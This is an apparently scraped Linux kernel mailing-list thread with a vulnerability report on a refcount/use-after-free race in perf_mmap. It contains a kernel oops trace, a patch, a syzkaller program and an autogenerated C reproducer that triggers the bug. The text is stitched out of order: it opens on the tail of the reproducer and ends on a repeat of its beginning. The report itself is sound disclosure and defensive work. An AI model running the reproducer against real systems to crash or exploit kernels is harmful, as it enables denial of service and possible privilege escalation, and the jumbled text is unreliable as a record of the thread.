  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
  NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
  NONFAILING(*(uint32_t*)0x200000000034 = 2);
  NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
  NONFAILING(*(uint64_t*)0x200000000040 = 8);
  NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
  NONFAILING(*(uint64_t*)0x200000000050 = 7);
  NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
  NONFAILING(*(uint32_t*)0x20000000005c = 1);
  NONFAILING(*(uint64_t*)0x200000000060 = 4);
  NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
  NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
  NONFAILING(*(uint16_t*)0x20000000006e = 0);
  NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
  NONFAILING(*(uint32_t*)0x200000000074 = 0);
  NONFAILING(*(uint64_t*)0x200000000078 = 7);
  res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
                /*cpu=*/1ul, /*group=*/r[0],
                /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
  if (res != -1)
    r[1] = res;
  // mmap arguments: addr=VMA[0x1000], len=0x1000, prot: mmap_prot=0x100000b,
  // flags: mmap_flags=0x13, fd: fd (resource), offset=0x0
  syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
          /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
          /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul,
          /*fd=*/r[1], /*offset=*/0ul);
  return 0;
}
On Sun, Feb 01, 2026 at 07:34:36PM +0800, Haocheng Yu wrote:

This indentation looks very odd, are you sure it is correct?

thanks,

greg k-h
From: Greg KH <gregkh@linuxfoundation.org>
Date: Sun, 1 Feb 2026 12:49:11 +0100
List: lkml
Thread-Id: 20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,

I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.

Summary
-------

A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.

The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.

I verified this on Linux kernel version 6.18.5.

Environment
-----------

- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

Symptoms and logs
-----------------

The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning. The full report is as below:

audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS:  00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
 <TASK>
 __refcount_add include/linux/refcount.h:289 [inline]
 __refcount_inc include/linux/refcount.h:366 [inline]
 refcount_inc include/linux/refcount.h:383 [inline]
 perf_mmap_rb kernel/events/core.c:7005 [inline]
 perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
 vfs_mmap include/linux/fs.h:2405 [inline]
 mmap_file mm/internal.h:167 [inline]
 __mmap_new_file_vma mm/vma.c:2413 [inline]
 __mmap_new_vma mm/vma.c:2476 [inline]
 __mmap_region+0xea5/0x2250 mm/vma.c:2670
 mmap_region+0x267/0x350 mm/vma.c:2740
 do_mmap+0x769/0xe50 mm/mmap.c:558
 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
 __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
 __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
 </TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>

Reproduce
---------

The issue is reproducible using the C reproducer attached.
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow:

1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.

3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.

4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, thread B can drop the buffer's reference count to zero during this unprotected window.

5. Crash/Warning: When thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0", resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------

The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. 
On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. 
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS:  000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
 <TASK>
 __refcount_add include/linux/refcount.h:289 [inline]
 __refcount_inc include/linux/refcount.h:366 [inline]
 refcount_inc include/linux/refcount.h:383 [inline]
 perf_mmap_rb kernel/events/core.c:7005 [inline]
 perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
 vfs_mmap include/linux/fs.h:2405 [inline]
 mmap_file mm/internal.h:167 [inline]
 __mmap_new_file_vma mm/vma.c:2413 [inline]
 __mmap_new_vma mm/vma.c:2476 [inline]
 __mmap_region+0xea5/0x2250 mm/vma.c:2670
 mmap_region+0x267/0x350 mm/vma.c:2740
 do_mmap+0x769/0xe50 mm/mmap.c:558
 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
 __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
 __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xac/0x2a0
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
